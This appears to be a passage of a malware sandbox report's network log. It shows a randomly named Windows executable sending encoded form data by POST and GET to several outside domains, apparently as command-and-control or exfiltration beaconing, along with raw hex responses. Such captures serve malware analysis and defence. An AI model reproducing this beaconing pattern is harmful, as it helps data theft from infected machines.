                                                                Jan 11, 2025 09:15:11.551192999 CET1236INData Raw: 64 38 0d 0a ec 9c 41 0a c2 30 10 45 af 92 23 08 96 92 ec bb 2d b8 f0 02 da 44 2d d8 19 91 6e f4 f4 12 51 18 89 42 94 60 8d f9 db 90 45 98 cd 63 f2 67 de ff d1 a5 9a 6f 79 6f 37 7c 14 6c d1 5a df 87 70 81 96 18 b4 88 82 65 4b 96 a0 73 a9 93 74 2e
                                                                Data Ascii: d8A0E#-D-nQB`Ecgoyo7|lZpeKst.5(%;+tYjj!y4kr /IeyagLjftQLfDb@ih1l2EFo@EefMt}YCD330n@_Ia
                                                                Jan 11, 2025 09:15:11.551208019 CET500INData Raw: 7f f4 2c d9 c3 fd 95 ab 18 a0 8a c3 31 4c a8 0e 65 2b 1c 26 f5 12 0e 93 a2 20 26 ca 82 98 3f 82 6b 00 94 db 01 4a 9a a6 b3 b3 f0 62 65 c3 20 43 d9 39 1e 26 e8 04 65 ab 16 26 f1 52 0b 93 a0 16 26 e2 5a 18 ec 2a f1 42 4b f6 9d 3b 56 9c 06 93 c7 c8
                                                                Data Ascii: ,1Le+& &?kJbe C9&e&R&Z*BK;V'>,%fyf^c3DT3a9BfR2=W_~eNVwmj@rpxAib6pJV]>Vq/g,ZZXKG@sKn
                                                                Jan 11, 2025 09:15:11.587255955 CET1236INData Raw: 33 36 0d 0a 1a ad 58 68 73 13 59 71 49 62 51 41 66 51 62 49 2a da a5 97 0a 01 60 d1 62 05 e7 fc 94 d1 81 31 a2 af bc 44 09 b6 d1 3b c9 46 ef 24 1b 96 77 92 01 00 00 00 ff ff 0d 0a 62 63 0d 0a 1a dd 13 33 5a d5 90 3c 38 96 94 5a 94 5b 9a 92 88 72
                                                                Data Ascii: 36XhsYqIbQAfQbI*`b1D;F$wbc3Z<8Z[rrFG)8+'(d*O/RpWLH]@QP`2G{A#j21HL*MC2JFbXhifT9ld<)N+I,KA`&$^I]@F
                                                                Jan 11, 2025 09:15:11.587280035 CET821INData Raw: 48 ad bb 1c bb 2e d8 b3 ac 11 ca 0c f3 65 3c dd 92 ed 9b f1 50 33 89 82 9a 09 0c 19 18 32 30 64 fa 69 c8 e4 72 a7 95 5c af b9 72 9f 31 dd 5d b9 24 a3 a4 00 65 82 28 73 12 0c 75 66 a8 33 43 9d 19 ea cc 80 17 3d 1a 34 c2 94 55 e6 90 e5 a1 e0 ec d1
                                                                Data Ascii: H.e<P320dir\r1]$e(suf3C=4U,\B]d7&8&2bb]Mo0+$Y(=J=+&imSi%Vr%b4Rxy01veP26W+&W98u,[OAy739lX4
                                                                Jan 11, 2025 09:15:11.590827942 CET1236INData Raw: 61 34 0d 0a 1a 9d 91 19 64 4b b7 06 c9 d4 d0 68 0d 33 a0 fb fa 0b 32 8b 32 4b 12 53 ca 90 f7 f5 83 c5 c0 87 cf a7 94 a5 e6 95 94 16 8d ce fb 13 b7 9f 1f 33 e0 86 e6 01 32 18 ab 95 0d a9 b2 5a d9 70 64 ac 56 1e 1d a3 1a 9d 87 19 ad 67 90 eb 19 13
                                                                Data Ascii: a4dKh322KS32ZpdVgJue9'5 hKP]<tytXdLz~R^iJ:rY\_ZVA95514fT;0I'o:$3927)?^e`*Q
                                                                Jan 11, 2025 09:15:11.590840101 CET233INData Raw: d8 7c 49 eb 03 6a a0 e6 54 2c b4 d6 93 f8 97 43 d7 88 ca f4 ea 22 aa fa 0a 31 81 09 30 d3 aa e1 0b be e0 0b be e0 8b 5c 98 c6 99 9d 52 76 84 cc f6 fe 48 6c 8c 75 43 af 48 b2 0c 52 c6 2b 1b 41 c9 04 25 13 94 4c 50 32 97 18 f9 73 d0 f5 a5 9d 04 f0
                                                                Data Ascii: |IjT,C"10\RvHluCHR+A%LP2sn/ &i(`(k0k0eq"5ndLpWLL}Y03Ai.# {qM!f&+fJ$fsUNy0s]ycLUm_
                                                                Jan 11, 2025 09:15:11.626620054 CET1236INData Raw: 33 63 0d 0a 1a 64 3b f5 47 cf 7f 19 1d 03 33 28 cf cf 49 cb 44 3e ff c5 bd 28 35 35 a5 52 21 3c 3f 27 6d b4 62 21 6a c2 1e 11 60 43 75 35 18 46 97 c5 82 2a 5d 16 8b a1 d4 65 01 00 00 00 ff ff 0d 0a 31 62 66 0d 0a ec 9d 3f 6b c3 30 10 c5 bf ca 4d
                                                                Data Ascii: 3cd;G3(ID>(55R!<?'mb!j`Cu5F*]e1bf?k0M&!K*R\EL/J(Q(`~y*ap8Dh!meME9hzqb]p^0oFya2wiye4d MRJj=Q6^4cdVbuDSf/x


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.749972104.21.28.65803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:12.800743103 CET1792OUTPOST /9fei/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 1252
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.binjai77rtp11f.xyz
                                                                Origin: http://www.binjai77rtp11f.xyz
                                                                Referer: http://www.binjai77rtp11f.xyz/9fei/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 77 6a 59 73 51 37 79 68 6e 39 72 4a 67 32 45 52 6b 74 5a 49 46 31 6a 58 31 71 6b 2b 76 42 51 57 4f 4f 54 6f 4d 2b 49 43 52 43 34 74 4a 34 54 4d 48 47 79 6e 32 53 5a 4f 77 6b 37 54 6e 65 66 4f 69 4e 43 6b 71 6c 51 35 67 76 33 73 4f 57 4b 38 4e 2f 51 4f 5a 58 78 36 4d 53 48 4a 4d 37 69 38 57 75 54 37 50 34 70 65 42 57 54 48 50 33 53 52 48 61 50 6e 31 65 51 38 42 63 4b 6f 44 4f 6f 6f 58 62 4a 33 46 61 51 46 74 48 6f 68 51 47 34 34 54 4d 4c 6d 6c 2f 7a 65 38 34 75 37 49 34 43 64 4f 65 53 5a 6e 34 42 6c 66 68 44 55 57 39 2b 76 54 77 34 43 77 4f 4b 65 70 4b 73 7a 30 49 55 66 63 51 52 49 58 66 61 42 35 44 66 63 6d 39 30 51 55 47 43 45 31 2f 54 51 30 42 72 45 78 70 34 5a 6f 48 6d 36 68 50 4d 65 6a 4d 72 2b 32 57 47 35 41 6d 48 7a 63 4d 75 77 46 65 32 7a 6d 45 61 4c 66 70 51 67 6d 39 68 44 46 56 36 74 45 4a 6a 36 6e 75 74 72 6d 70 2f 63 37 77 79 6d 74 6d 64 34 38 59 4e 64 53 70 35 70 6b 76 4b 52 78 5a 7a 47 71 65 6a 78 6a 61 76 52 54 52 48 79 57 72 7a 6e 61 7a 61 41 77 50 53 63 6d 33 [TRUNCATED]
                                                                Data Ascii: UfjxuDP=wjYsQ7yhn9rJg2ERktZIF1jX1qk+vBQWOOToM+ICRC4tJ4TMHGyn2SZOwk7TnefOiNCkqlQ5gv3sOWK8N/QOZXx6MSHJM7i8WuT7P4peBWTHP3SRHaPn1eQ8BcKoDOooXbJ3FaQFtHohQG44TMLml/ze84u7I4CdOeSZn4BlfhDUW9+vTw4CwOKepKsz0IUfcQRIXfaB5Dfcm90QUGCE1/TQ0BrExp4ZoHm6hPMejMr+2WG5AmHzcMuwFe2zmEaLfpQgm9hDFV6tEJj6nutrmp/c7wymtmd48YNdSp5pkvKRxZzGqejxjavRTRHyWrznazaAwPScm3NFtPLv0/5eR/9ncV0cmqWxVKRfSGXsUyNSzlb0XWIGErW6cUaHQ6JsrF9wKVAgU6ptaPRUj26D+3jvzCLfEDIa2AvDiOl0HQ1mVIPFA4zBVzOX5JTmkgywGEjNVraNY2aWueqDo1r3LPLFiEjboK0sbqkE/5mTLoXC8mA+AMUjempnngUEZYhS+xW+IqsN4tMi2eYEeaXth1cohU5v2cNhvCr7185z3y5YtYzpw/BeSOC/oWsg1fvA9HfxnJ1LP56ZteCA+aAZAObtHw9v01OzU2ixN6oxNtcO045UliP1Sgxu3HJ4lrdK/0ne/QkWTwxUcPSb2Y7QR/+cPTNwfXJ1+lLfuE8VI63U5Vgd7ZSUQA6wDRGMeOPTIzhex8CSzQvSbdhyPNu5DTYPIANjBtY/vGrpsoBNYHqC9aap2gGzkNW1d5niBEpmi+BD3vItsGJEyIMzwCU/ET/MeNIUTqs0nZBpAr2Vhp+hRt1GPG8i0FyWuBqdDWSdRF9+mdGk530MVvOqRZZDXLITNYtWU7cb/7NQ1JqXAQ2QrJrA8IkylX5dEUQYi3y4EreYTxGh8g+9iJAZMkLBWZi8127bPDLvVQeEHtkzQV01c1iZ6ztsN8op8GV9JRIEQ0tRMJC8J2oLCBU4HqUjvM/9WpiZnZCBBPEuzN1k6DMk [TRUNCATED]
                                                                Jan 11, 2025 09:15:13.352886915 CET1236INHTTP/1.1 200 OK
                                                                Date: Sat, 11 Jan 2025 08:15:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qeIWRfJAmhSDtIZvz8SQLywQZRTVlSYQMg%2FUKbjx5SAdFZI7L3rer%2FrvdLharxti3%2FPymx8vURe5%2B9tEPQElG40IrhqmZgP1An1yUQGx7wjmoU6aaMNsmnkXHoSGm%2FjuTs4sFKETbAcj"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 9003752b8a83434b-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1792&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 36 30 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 57 5b 73 1a b9 12 7e 4e aa f2 1f 7a e7 54 ed 13 62 8c 13 af 4f ed 82 2b e0 78 1d bc 04 53 86 ec b9 bc f5 8c 9a 41 b6 46 9a 95 04 98 ad fc f8 53 9a e1 32 80 01 3b 27 55 f6 83 79 60 46 ad ee 56 ab fb d3 d7 9a 77 6f eb 3f 7d ba 3e 1f fc a7 77 01 23 97 ca b3 77 6f eb fe 09 12 55 d2 08 48 05 67 ef de 02 00 d4 47 84 7c fe 9e 8f 7f 62 0c 9c 70 92 80 b1 b2 3c 97 9d dd 0c 7a d0 69 ff 79 01 ad 76 f7 aa d9 3e 3d 85 6f d0 ba 3e bf be 69 76 a1 f9 e9 4b bb 0b fd ce f5 00 2e 9b e7 d7 37 f0 b9 79 d3 86 76 b7 0d df 60 65 37 57 2e d9 97 2c 2e 9b 5f 7a cd ee 25 7c b9 e8 fa c7 e0 e2 e6 6b ef 53 73 70 51 0f 8b e5 37 e2 4c c9 e1 46 98 b9 28 1e a1 b1 e4 1a c1 d7 c1 ef ec 9f c1 d6 bc c2 94 1a c1 44 d0 34 d3 c6 05 10 6b e5 48 b9 46 30 15 dc 8d 1a 9c 26 22 26 96 0f 2a 20 94 70 02 25 b3 31 4a 6a d4 aa 47 db fe 46 ce 65 8c fe 1a 8b 49 23 f8 37 fb da 64 e7 3a cd d0 89 48 52 c9 79 fb a2 41 3c a1 fd e6 31 c6 23 62 de c6 68 59 32 56 9a e5 53 fb ad 33 83 49 8a 4f 36 a3 fb 4c 18 b2 25 [TRUNCATED]
                                                                Data Ascii: 60bW[s~NzTbO+xSAFS2;'Uy`FVwo?}>w#woUHgG|bp<ziyv>=o>ivK.7yv`e7W.,._z%|kSspQ7LF(D4kHF0&"&* p%1JjGFeI#7d:HRyA<1#bhY2VS3IO6L%]Idc#2'*[s}\+)LF&G-Tt F+VCYYl"8)7
                                                                Jan 11, 2025 09:15:13.352912903 CET1129INData Raw: e5 e0 ef 68 36 d5 86 97 37 da 12 ea 16 c5 e9 69 05 8c cb 60 35 5a bc 79 71 65 6b e1 ca 5a 14 3a df 44 05 a2 ad fd 55 c0 fa 74 2c 14 6c 9e a6 35 51 be cd 07 94 96 f2 60 13 f4 52 a8 bb 02 f4 6f 72 59 3e 36 24 3d 76 94 56 22 46 19 c0 c8 d0 b0 11 f8
                                                                Data Ascii: h67i`5ZyqekZ:DUt,l5Q`RorY>6$=vV"F_qj$twkNWDZl(RLCjmg>kGDn3$TPeii3}P=.]MTSYPS:pjZG)<,[9c?Kb6(a
                                                                Jan 11, 2025 09:15:13.394526958 CET1236INData Raw: 64 32 0d 0a 1a 80 04 e1 3b 5a 69 0c d6 8e 67 f0 c0 74 3c 83 47 13 c4 e0 4c 10 6e 03 93 20 dc 46 13 c4 60 6d 56 86 b8 0e 4c b3 32 c4 75 34 49 0c ce 24 e1 63 64 34 20 49 c2 c7 c8 68 34 49 0c ce 24 e1 1c 68 39 20 49 c2 39 d0 72 34 49 0c ce 24 11 12
                                                                Data Ascii: d2;Zigt<GLn F`mVL2u4I$cd4 Ih4I$h9 I9r4I$20 j6clEh +I@Gz@^jEuLB:.'O(K/M$-uIM!KhK\]k^^X6ZYX3ben0_BzE
                                                                Jan 11, 2025 09:15:13.394542933 CET426INData Raw: ff 0d 0a 37 38 0d 0a 22 bf 46 31 b1 18 ad 51 e8 5e a3 8c ae 32 18 ad 52 06 c5 e4 7e 4e 7e 76 26 72 8d 12 04 da 22 93 9e 0a da d4 e1 93 9f 9d a9 e0 9b 9a 9e 08 52 37 5a c5 10 53 c5 e0 0a bd a1 5a e7 98 62 d4 39 a6 54 a9 73 4c 47 46 9d 33 c8 56 2b
                                                                Data Ascii: 78"F1Q^2R~N~v&r"R7ZSZb9TsLGF3V+|3:?ZTTTnBti`1220W#E/`LP`5["tgptV`*Ax-OUw}LqnzTHhsL/
                                                                Jan 11, 2025 09:15:13.433851957 CET1236INData Raw: 65 64 0d 0a ec 9d b1 0a 83 30 14 45 7f 25 9f 50 17 dd 9d 3a 76 ec fa b2 58 21 3a 18 a1 a5 5f 5f 02 2d 84 06 21 4a a0 49 73 56 27 79 62 2e f7 9d f7 6e 20 32 10 19 88 cc 3f e7 2f eb 9b 18 a3 e7 a7 78 42 d3 8f 83 ea c5 5a 75 16 77 7e b9 3e 0c 42 13
                                                                Data Ascii: ed0E%P:vX!:__-!JIsV'yb.n 2?/xBZuw~>B!4aXa@4YAV|3G3ApY$%Ocyo}24QneIn.2Q->F3$Ots11I0[W
                                                                Jan 11, 2025 09:15:13.433868885 CET397INData Raw: 06 d1 56 d5 df 4a bb d9 7c e6 fd 3f 33 3f 1b 1c 7b 1b c8 9c 48 ab 49 32 f9 73 3e 90 1d fc 0f dc fd 75 21 e5 6f aa 87 bc 32 f2 ca c8 2b 23 af 0c d9 f9 88 93 0d d4 d1 20 26 d3 96 fe 81 35 c2 d8 7e 74 10 9d 95 83 97 77 8b 97 25 4d e3 11 4d e3 49 68
                                                                Data Ascii: VJ|?3?{HI2s>u!o2+# &5~tw%MMIh/1/!8H+U-{R7G+|yv]vIN7[Cs~Ym*oZ-\`~#dfLJiZ h46hg#AfQHD-X,[xo)o=y1k>;/0!+olOLb
                                                                Jan 11, 2025 09:15:13.471487999 CET1236INData Raw: 65 35 0d 0a ec 9d bd 0a c2 40 10 84 5f 65 3b 5b 8b 23 0f 10 1b b1 f2 a7 b0 de 78 67 72 a2 1b b9 1f 7c 7d 49 44 30 a6 39 21 42 42 a6 bd bb 6a e1 18 66 d9 9d 0f c2 f2 1f 12 99 0f ec ee d6 71 30 5f d0 4b da b6 a7 9e 56 b5 46 63 2c 19 79 d9 29 1b 98
                                                                Data Ascii: e5@_e;[#xgr|}ID09!BBjfq0_KVFc,y)d`IHM+EJh)TvakG=2HbNTP0Lf/MjYY>)%m"d'Ev5g5gHk`~g~~;Cstl/,Hk<2f4_
                                                                Jan 11, 2025 09:15:13.471580982 CET713INData Raw: d5 4a 82 65 a2 58 e6 08 18 ea cc 50 67 86 3a 33 d4 99 81 5e 4c 3d d9 49 2b b6 73 8f 59 ee 3b 4e be bb 21 b5 9c cc 41 2e 31 e4 72 8a 59 b6 4e e6 59 e0 64 9e 25 71 32 cf b0 be 94 68 21 c6 5b 19 9c cc 93 95 52 3d 7d b2 fc e4 3a f3 b5 52 bd 0b b0 bf
                                                                Data Ascii: JeXPg:3^L=I+sY;N!A.1rYNYd%q2h![R=}:Rs D6p`I2~D /hku1Zx)`]~e CqS<'[~"w`c3/WI+/\b)[_\n-;)r[e+LDi`_os)*
                                                                Jan 11, 2025 09:15:13.473812103 CET1236INData Raw: 33 61 0d 0a 1a 9d 91 19 64 4b b7 06 c9 d4 d0 68 0d 33 a0 fb fa 0b 32 8b 32 4b 12 53 ca 90 f7 f5 83 c5 c0 87 cf a7 94 a5 e6 95 94 16 8d ce fb 13 b7 9f 1f 33 e0 48 aa 6b 00 00 00 00 ff ff 0d 0a 66 37 0d 0a ec 9d b1 0a c2 30 10 86 5f 25 2f 20 58 90
                                                                Data Ascii: 3adKh322KS3Hkf70_%/ XHqqKQiN[E[n3AL2Qld20gBl&&ze[OMktQW2ex+0ben*DLJFnHC/vIGiRl`.rs"MO./bW$8t
                                                                Jan 11, 2025 09:15:13.473872900 CET232INData Raw: 17 7c c1 97 a6 d2 2e e9 55 24 2e 90 b9 7c 3e 99 56 63 7a 4c 42 c9 b2 48 99 d5 d8 08 25 13 4a 26 94 4c 28 99 4b 4c 73 ea 83 9b 87 2c c0 7f d6 e8 c7 d1 19 fb 3e 80 98 12 62 f2 99 ed f3 8f b2 d5 1a 4c bd c9 1a 4c cd 1a cc 81 d7 60 68 59 1e b8 08 73
                                                                Data Ascii: |.U$.|>VczLBH%J&L(KLs,>bLL`hYsQM[Z&L+ya`70bi`HPfeFQFkj.M=jechQSZ1eHm3bZeDZ=zP})UMG@
                                                                Jan 11, 2025 09:15:13.510359049 CET1236INData Raw: 64 32 0d 0a ec 9d 31 0a c3 30 0c 45 af e2 23 74 4b 0e 10 e8 d4 a5 2d 64 16 58 76 03 ae 5d d4 98 90 db 97 10 4a 5d 42 c1 83 87 a4 f9 ab f1 a4 e5 f1 bf a4 af 95 6d ea 23 ff 05 1e d8 61 08 ce 74 69 fe cb 51 98 f5 a8 da e0 0c c0 92 d5 b0 ff 14 6c ab
                                                                Data Ascii: d210E#tK-dXv]J]Bm#atiQl`R,>$?m.bh)5N:,|]p^GOz-6u\~ml MKz[[(A3]fwqE]}.~y3d4Qo0S@T/J


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.749973104.21.28.65803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:15.340862989 CET493OUTGET /9fei/?UfjxuDP=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHJwFOLy3VCtOxW9qlL7MmBkbbL06rPuqE58QtHe+NUuoOX41pN6Zc3VUv&LRJdx=qxGHfdRH_npdPLS HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                Host: www.binjai77rtp11f.xyz
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Jan 11, 2025 09:15:15.890052080 CET790INHTTP/1.1 200 OK
                                                                Date: Sat, 11 Jan 2025 08:15:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rN%2BFpvuTL0KvpMcripo3s3FGI6QHfvYyyROQu3%2FYtWM69Z0OZRN0i7sdMB0quMzzM9fzf3QAvdDwRviiaSR7Erm6s%2BkU40CmrDQVoY8lENXx%2FHZ%2F%2F%2BofLy5SJihynKUb4H2w0GZXFaE"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 9003753b6dfa42e1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1764&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=493&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Jan 11, 2025 09:15:15.890223026 CET1236INData Raw: 31 66 63 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 74 69 74 6c 65 20 2d 2d 3e 0d 0a 20 20 20
                                                                Data Ascii: 1fc1<!DOCTYPE html><html lang="en"> <head> ... title --> <title>RTP LIVE BINJAI77 | BOCORAN ADMIN SLOT GACOR HARI INI | RTP LIVE BOCORAN BINJAI77 | SLOT GACOR GAMPANG MENANG TERUPDATE</title> ... meta --
                                                                Jan 11, 2025 09:15:15.890243053 CET1236INData Raw: 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72
                                                                Data Ascii: css/bootstrap.min.css"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/css/all.min.css"> <link rel="stylesheet" href="assets/css/styles.css"> </head> <body>
                                                                Jan 11, 2025 09:15:15.890259027 CET448INData Raw: 6f 72 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 78 2d 33 20 70 79 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                Data Ascii: or-4"> <div class="container px-3 py-4"> <div class="logo-container bg-color-1 mb-3"> <div class="logo-wrapper py-3"> <a href="/" class="d-block"><img class="w-100" sr
                                                                Jan 11, 2025 09:15:15.890326977 CET1236INData Raw: 70 61 6e 3e 50 4f 4c 41 20 52 54 50 20 4c 49 56 45 20 47 41 43 4f 52 20 7c 20 42 49 4e 4a 41 49 37 37 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: pan>POLA RTP LIVE GACOR | BINJAI77</span> </div> <h5 class="text-white text-center font-weight-bolder mb-3"> <span><i class="fa fa-calendar-alt"></i>&nbsp;</span> <spa
                                                                Jan 11, 2025 09:15:15.890338898 CET1236INData Raw: 30 20 70 78 2d 31 20 70 78 2d 6c 67 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: 0 px-1 px-lg-0"> <div class="col px-1 carousel-item active"> <div class="card-provider">
                                                                Jan 11, 2025 09:15:15.890458107 CET448INData Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 70 72 6f 76 69 64 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: <div class="card-provider"> <a href="/HB"> <img class="img-provider w-100" src="assets/images/providers/HB.png">
                                                                Jan 11, 2025 09:15:15.890470028 CET1236INData Raw: 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 20 70 78 2d 31 20 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 20 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: <div class="col px-1 carousel-item "> <div class="card-provider"> <a href="/SG"> <img class="
                                                                Jan 11, 2025 09:15:15.890481949 CET1061INData Raw: 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 70 72 6f 76 69 64 65 72 20 77 2d 31
                                                                Data Ascii: <img class="img-provider w-100" src="assets/images/providers/NLC.png"> </a> </div>
                                                                Jan 11, 2025 09:15:15.890734911 CET1236INData Raw: 31 31 35 63 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 70 72 6f 76 69 64
                                                                Data Ascii: 115c <img class="img-provider w-100" src="assets/images/providers/MG.png"> </a> </div>
                                                                Jan 11, 2025 09:15:15.895389080 CET1236INData Raw: 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: </a> </div> </div> <div class="col px-1 carousel-item ">


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.749974104.21.54.126803604C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 09:15:21.575131893 CET750OUTPOST /wmxx/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate, br
                                                                Cache-Control: no-cache
                                                                Content-Length: 220
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Connection: close
                                                                Host: www.vietnamtour.pro
                                                                Origin: http://www.vietnamtour.pro
                                                                Referer: http://www.vietnamtour.pro/wmxx/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                Data Raw: 55 66 6a 78 75 44 50 3d 2b 66 78 6a 68 32 33 59 58 63 79 45 6d 66 53 72 69 2b 32 45 54 6b 4b 41 6f 52 42 2f 77 74 33 68 66 56 39 71 33 77 77 56 72 2f 6f 4d 77 66 32 46 56 71 68 57 74 69 6e 4a 65 39 78 51 4e 4c 35 4a 78 2f 78 51 31 78 63 75 51 51 71 57 4d 47 44 59 61 30 62 56 72 66 30 6d 61 43 58 51 62 68 49 52 6e 78 50 35 4d 4c 6d 58 39 51 32 56 30 32 34 73 32 75 42 30 6f 6a 53 6c 54 43 34 58 4c 4d 4a 5a 55 33 32 35 71 4f 4a 73 6a 70 57 56 63 39 62 77 56 70 62 49 42 78 39 31 47 5a 72 62 36 74 39 42 47 57 2f 31 47 56 65 31 48 69 39 61 4a 49 55 6c 53 4a 56 34 73 6a 52 52 53 30 37 31 30 51 37 2f 4a 6d 74 47 36 2f 41 45 52 2b 66 63 68 48 6c 68 61 51 3d 3d
                                                                Data Ascii: UfjxuDP=+fxjh23YXcyEmfSri+2ETkKAoRB/wt3hfV9q3wwVr/oMwf2FVqhWtinJe9xQNL5Jx/xQ1xcuQQqWMGDYa0bVrf0maCXQbhIRnxP5MLmX9Q2V024s2uB0ojSlTC4XLMJZU325qOJsjpWVc9bwVpbIBx91GZrb6t9BGW/1GVe1Hi9aJIUlSJV4sjRRS0710Q7/JmtG6/AER+fchHlhaQ==
                                                                Jan 11, 2025 09:15:22.541867018 CET1072INHTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 08:15:22 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
